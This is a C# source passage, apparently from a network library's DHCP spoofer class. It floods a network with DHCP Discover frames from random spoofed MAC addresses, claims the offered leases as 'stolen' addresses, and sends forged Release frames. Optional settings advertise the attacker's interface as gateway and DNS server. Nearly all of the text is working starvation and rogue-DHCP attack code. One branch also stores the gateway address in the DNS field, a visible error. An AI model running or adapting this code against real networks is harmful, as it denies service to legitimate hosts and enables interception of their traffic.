/// <summary>
/// Handles a DHCP frame and sends responses and requests or leases addresses according to its contents
/// </summary>
/// <param name="dhcFrame">The DHCP frame to handle</param>
/// <param name="udpFrame">The UDP frame</param>
/// <param name="ipv4Frame">The IPv4 frame</param>
/// <param name="tdf">The traffic description frame</param>
/// <param name="fInputFrame">The original input frame</param>
protected override void HandleDHCPFrame(DHCPFrame dhcFrame, UDP.UDPFrame udpFrame, IP.IPFrame ipv4Frame, TrafficDescriptionFrame tdf, Frame fInputFrame)
{
base.HandleDHCPFrame(dhcFrame, udpFrame, ipv4Frame, tdf, fInputFrame);
EthernetFrame ethFrame = GetEthernetFrame(fInputFrame);
bool bIsOffer = false;
bool bIsACK = false;
foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems())
{
if (tlvItem.DHCPOptionType == DHCPOptions.DHCPMessageType)
{
if (dhcFrame.MessageType == DHCPType.BootReply && (DHCPMessageType)tlvItem.Data[0] == DHCPMessageType.Offer && lOpenClientTransactions.Contains(dhcFrame.TransactionID))
{
bIsOffer = true;
break;
}
if (dhcFrame.MessageType == DHCPType.BootReply && (DHCPMessageType)tlvItem.Data[0] == DHCPMessageType.ACK && lOpenClientTransactions.Contains(dhcFrame.TransactionID))
{
bIsACK = true;
break;
}
}
}
if (bIsOffer)
{
#region Client Process offer
IPAddress ipaServer = ipv4Frame.SourceAddress;
IPAddress myAddress = dhcFrame.OfferedAddress;
DHCPFrame newDHCPFrame = new DHCPFrame();
newDHCPFrame.ClientAddress = IPAddress.Any;
newDHCPFrame.ClientMac = dhcFrame.ClientMac;
newDHCPFrame.Hardwarelen = 6;
newDHCPFrame.HardwareType = eExNetworkLibrary.HardwareAddressType.Ethernet;
newDHCPFrame.Hops = 0;
newDHCPFrame.MessageType = DHCPType.BootRequest;
newDHCPFrame.OfferedAddress = IPAddress.Any;
newDHCPFrame.RelayAddress = IPAddress.Any;
newDHCPFrame.RequestedFile = "";
newDHCPFrame.RequestedServerName = "";
newDHCPFrame.Secs = dhcFrame.Secs + 1;
newDHCPFrame.ServerAddress = IPAddress.Any;
newDHCPFrame.ValidIPFlag = true;
newDHCPFrame.TransactionID = dhcFrame.TransactionID;
DHCPTLVItem tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.DHCPMessageType;
tlvItem.Data = new byte[] { (byte)DHCPMessageType.Request };
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.ClientID;
byte[] bIDData = new byte[7];
bIDData[0] = (byte)HardwareAddressType.Ethernet;
dhcFrame.ClientMac.AddressBytes.CopyTo(bIDData, 1);
tlvItem.Data = bIDData;
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.AddressRequest;
tlvItem.Data = myAddress.GetAddressBytes();
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.Hostname;
tlvItem.Data = Encoding.ASCII.GetBytes(strHostnameToSpoof + iIPIDCounter);
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.DHCPServerID;
tlvItem.Data = ipaServer.GetAddressBytes();
newDHCPFrame.AddDHCPTLVItem(tlvItem);
UDP.UDPFrame newUDPFrame = new eExNetworkLibrary.UDP.UDPFrame();
newUDPFrame.DestinationPort = iDHCPOutPort;
newUDPFrame.SourcePort = iDHCPInPort;
newUDPFrame.EncapsulatedFrame = newDHCPFrame;
IP.IPv4Frame newIPv4Frame = new eExNetworkLibrary.IP.IPv4Frame();
newIPv4Frame.Version = 4;
newIPv4Frame.DestinationAddress = IPAddress.Broadcast;
newIPv4Frame.SourceAddress = IPAddress.Any;
newIPv4Frame.Protocol = eExNetworkLibrary.IP.IPProtocol.UDP;
newIPv4Frame.EncapsulatedFrame = newUDPFrame;
newIPv4Frame.Identification = (uint)IncrementIPIDCounter();
newIPv4Frame.TimeToLive = 128;
ethFrame = new eExNetworkLibrary.Ethernet.EthernetFrame();
ethFrame.Destination = new MACAddress(new byte[] { 255, 255, 255, 255, 255, 255 });
ethFrame.Source = dhcFrame.ClientMac;
ethFrame.EtherType = eExNetworkLibrary.EtherType.IPv4;
ethFrame.EncapsulatedFrame = newIPv4Frame;
TrafficDescriptionFrame tdFrame = new TrafficDescriptionFrame(null, DateTime.Now);
tdFrame.EncapsulatedFrame = ethFrame;
if (tdf != null && tdf.SourceInterface != null)
{
tdf.SourceInterface.Send(tdFrame);
}
#endregion
}
else if (bIsACK)
{
#region Client Process ACK
if (tdf != null && tdf.SourceInterface != null)
{
IPInterface ipiSource = tdf.SourceInterface;
DHCPPool dhPool = GetPoolForInterface(ipiSource);
DHCPPoolItem dpiItem = new DHCPPoolItem();
dpiItem.Address = dhcFrame.OfferedAddress;
if (dhPool.GetItemForAddress(dpiItem.Address) == null)
{
if (bRedirectGateway)
{
if (ipaGateway == null)
{
dpiItem.Gateway = ipiSource.IpAddresses[0];
}
else
{
dpiItem.Gateway = ipaGateway;
}
}
else
{
IPAddress ipGateway = IPAddress.Any;
foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems())
{
if (tlvItem.DHCPOptionType == DHCPOptions.Router)
{
ipGateway = new IPAddress(tlvItem.Data);
break;
}
}
dpiItem.DNSServer = ipGateway;
}
if (bRedirectDNSServer)
{
if (ipaDNSServer == null)
{
dpiItem.DNSServer = ipiSource.IpAddresses[0];
}
else
{
dpiItem.DNSServer = ipaDNSServer;
}
}
else
{
IPAddress ipDNS = IPAddress.Any;
foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems())
{
if (tlvItem.DHCPOptionType == DHCPOptions.DomainNameServer)
{
ipDNS = new IPAddress(tlvItem.Data);
break;
}
}
dpiItem.DNSServer = ipDNS;
}
IPAddress ipServer = null;
foreach (DHCPTLVItem tlvItem in dhcFrame.GetDHCPTLVItems())
{
if (tlvItem.DHCPOptionType == DHCPOptions.DHCPServerID)
{
ipServer = new IPAddress(tlvItem.Data);
break;
}
}
dpiItem.DHCPServer = ipServer;
dpiItem.Netmask = ipiSource.Subnetmasks[0];
dpiItem.DHCPServerMAC = ethFrame.Source;
AddPoolItem(dpiItem, dhPool, ipiSource);
dictPoolItemSpoofedMAC.Add(dpiItem, dhcFrame.ClientMac);
if (dictIPSpoofedMACs.ContainsKey(dpiItem.Address))
{
dictIPSpoofedMACs.Remove(dpiItem.Address);
}
dictIPSpoofedMACs.Add(dpiItem.Address, dhcFrame.ClientMac);
lServers.Add(ipv4Frame.SourceAddress);
InvokeAddressStolen(new DHCPServerEventArgs(dhPool, dpiItem, ipiSource));
}
}
lOpenClientTransactions.Remove(dhcFrame.TransactionID);
#endregion
}
}
/// <summary>
/// Forces this DHCP spoofer to release all stolen addresses (Experimental)
/// </summary>
public void ReleasePools()
{
foreach (DHCPPool pPool in DHCPPools)
{
foreach (DHCPPoolItem dhcpItem in pPool.Pool)
{
//DHCP Release:
//My IP in OfferedAddress
//DHCP TLVs: Client ID, Server ID, DHCP Type = Release
if (dictPoolItemSpoofedMAC.ContainsKey(dhcpItem) && dhcpItem.DHCPServer != null && dhcpItem.DHCPServerMAC != null)
{
DHCPFrame newDHCPFrame = new DHCPFrame();
newDHCPFrame.ClientAddress = IPAddress.Any;
newDHCPFrame.ClientMac = dictPoolItemSpoofedMAC[dhcpItem];
newDHCPFrame.Hardwarelen = 6;
newDHCPFrame.HardwareType = eExNetworkLibrary.HardwareAddressType.Ethernet;
newDHCPFrame.Hops = 0;
newDHCPFrame.MessageType = DHCPType.BootReply;
newDHCPFrame.OfferedAddress = dhcpItem.Address;
newDHCPFrame.RelayAddress = IPAddress.Any;
newDHCPFrame.RequestedFile = "";
newDHCPFrame.RequestedServerName = "";
newDHCPFrame.Secs = 0;
newDHCPFrame.ServerAddress = dhcpItem.DHCPServer;
newDHCPFrame.ValidIPFlag = true;
newDHCPFrame.TransactionID = rRandom.Next(65535);
DHCPTLVItem tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.DHCPMessageType;
tlvItem.Data = new byte[] { (byte)DHCPMessageType.Release };
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.ClientID;
byte[] bIDData = new byte[7];
bIDData[0] = (byte)HardwareAddressType.Ethernet;
dictPoolItemSpoofedMAC[dhcpItem].AddressBytes.CopyTo(bIDData, 1);
tlvItem.Data = bIDData;
newDHCPFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.DHCPServerID;
tlvItem.Data = dhcpItem.DHCPServer.GetAddressBytes();
newDHCPFrame.AddDHCPTLVItem(tlvItem);
UDP.UDPFrame newUDPFrame = new eExNetworkLibrary.UDP.UDPFrame();
newUDPFrame.DestinationPort = iDHCPOutPort;
newUDPFrame.SourcePort = iDHCPInPort;
newUDPFrame.EncapsulatedFrame = newDHCPFrame;
IP.IPv4Frame newIPv4Frame = new eExNetworkLibrary.IP.IPv4Frame();
newIPv4Frame.Version = 4;
newIPv4Frame.DestinationAddress = dhcpItem.DHCPServer;
newIPv4Frame.SourceAddress = dhcpItem.Address;
newIPv4Frame.Protocol = eExNetworkLibrary.IP.IPProtocol.UDP;
newIPv4Frame.EncapsulatedFrame = newUDPFrame;
newIPv4Frame.Identification = (uint)IncrementIPIDCounter();
newIPv4Frame.TimeToLive = 128;
Ethernet.EthernetFrame ethFrame = new eExNetworkLibrary.Ethernet.EthernetFrame();
ethFrame.Destination = dhcpItem.DHCPServerMAC;
ethFrame.Source = dictPoolItemSpoofedMAC[dhcpItem];
ethFrame.EtherType = eExNetworkLibrary.EtherType.IPv4;
ethFrame.EncapsulatedFrame = newIPv4Frame;
TrafficDescriptionFrame tdFrame = new TrafficDescriptionFrame(null, DateTime.Now);
tdFrame.EncapsulatedFrame = ethFrame;
foreach (IPInterface ipi in GetInterfacesForAddress(newIPv4Frame.DestinationAddress))
{
ipi.Send(tdFrame);
}
lSpoofedMACs.Remove(dictPoolItemSpoofedMAC[dhcpItem]);
dictPoolItemSpoofedMAC.Remove(dhcpItem);
RemovePoolItem(dhcpItem, pPool, null);
Thread.Sleep(iSleepDuration);
}
}
}
dictPoolItemSpoofedMAC.Clear();
dictIPSpoofedMACs.Clear();
}
void tRequestTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{
if (bStealAdresses && !bPause)
{
//Send out a spoofed DHCPDiscoverPacket.
if (lInterfaces.Count > 0)
{
#region StealAddresses
MACAddress macSpoofedAddress = new MACAddress(new byte[] { 00, 0x1D, 0xE5, (byte)rRandom.Next(256), (byte)rRandom.Next(256), (byte)rRandom.Next(256) });
DHCPFrame dhcFrame = new DHCPFrame();
dhcFrame.ClientAddress = IPAddress.Any;
dhcFrame.ClientMac = macSpoofedAddress;
dhcFrame.Hardwarelen = 6;
dhcFrame.HardwareType = eExNetworkLibrary.HardwareAddressType.Ethernet;
dhcFrame.Hops = 0;
dhcFrame.MessageType = DHCPType.BootRequest;
dhcFrame.OfferedAddress = IPAddress.Any;
dhcFrame.RelayAddress = IPAddress.Any;
dhcFrame.RequestedFile = "";
dhcFrame.RequestedServerName = "";
dhcFrame.Secs = 0;
dhcFrame.ServerAddress = IPAddress.Any;
dhcFrame.ValidIPFlag = true;
dhcFrame.TransactionID = rRandom.Next();
DHCPTLVItem tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.DHCPMessageType;
tlvItem.Data = new byte[] { (byte)DHCPMessageType.Discover };
dhcFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.ClientID;
byte[] bIDData = new byte[7];
bIDData[0] = (byte)HardwareAddressType.Ethernet;
macSpoofedAddress.AddressBytes.CopyTo(bIDData, 1);
tlvItem.Data = bIDData;
dhcFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.AddressRequest;
tlvItem.Data = IPAddress.Any.GetAddressBytes();
dhcFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.Hostname;
tlvItem.Data = Encoding.ASCII.GetBytes(strHostnameToSpoof + iIPIDCounter);
dhcFrame.AddDHCPTLVItem(tlvItem);
tlvItem = new DHCPTLVItem();
tlvItem.DHCPOptionType = DHCPOptions.ParameterList;
tlvItem.Data = new byte[] { (byte)DHCPOptions.SubnetMask, (byte)DHCPOptions.DomainNameServer, (byte)DHCPOptions.DomainName, (byte)DHCPOptions.Router };
dhcFrame.AddDHCPTLVItem(tlvItem);
UDP.UDPFrame udpFrame = new eExNetworkLibrary.UDP.UDPFrame();
udpFrame.DestinationPort = iDHCPOutPort;
udpFrame.SourcePort = iDHCPInPort;
udpFrame.EncapsulatedFrame = dhcFrame;
IP.IPv4Frame ipv4Frame = new eExNetworkLibrary.IP.IPv4Frame();
ipv4Frame.Version = 4;
ipv4Frame.DestinationAddress = IPAddress.Broadcast;
ipv4Frame.SourceAddress = IPAddress.Any;
ipv4Frame.Protocol = eExNetworkLibrary.IP.IPProtocol.UDP;
ipv4Frame.EncapsulatedFrame = udpFrame;
ipv4Frame.TimeToLive = 128;
ipv4Frame.Identification = (uint)IncrementIPIDCounter();
Ethernet.EthernetFrame ethFrame = new eExNetworkLibrary.Ethernet.EthernetFrame();
ethFrame.Destination = new MACAddress(new byte[] { 255, 255, 255, 255, 255, 255 });
ethFrame.Source = macSpoofedAddress;
ethFrame.EtherType = eExNetworkLibrary.EtherType.IPv4;
ethFrame.EncapsulatedFrame = ipv4Frame;
TrafficDescriptionFrame tdFrame = new TrafficDescriptionFrame(null, DateTime.Now);
tdFrame.EncapsulatedFrame = ethFrame;
foreach (IPInterface ipi in lInterfaces)
{
ipi.Send(tdFrame);
lOpenClientTransactions.Add(dhcFrame.TransactionID);
lSpoofedMACs.Add(ethFrame.Source);
}
#endregion
}
}
}
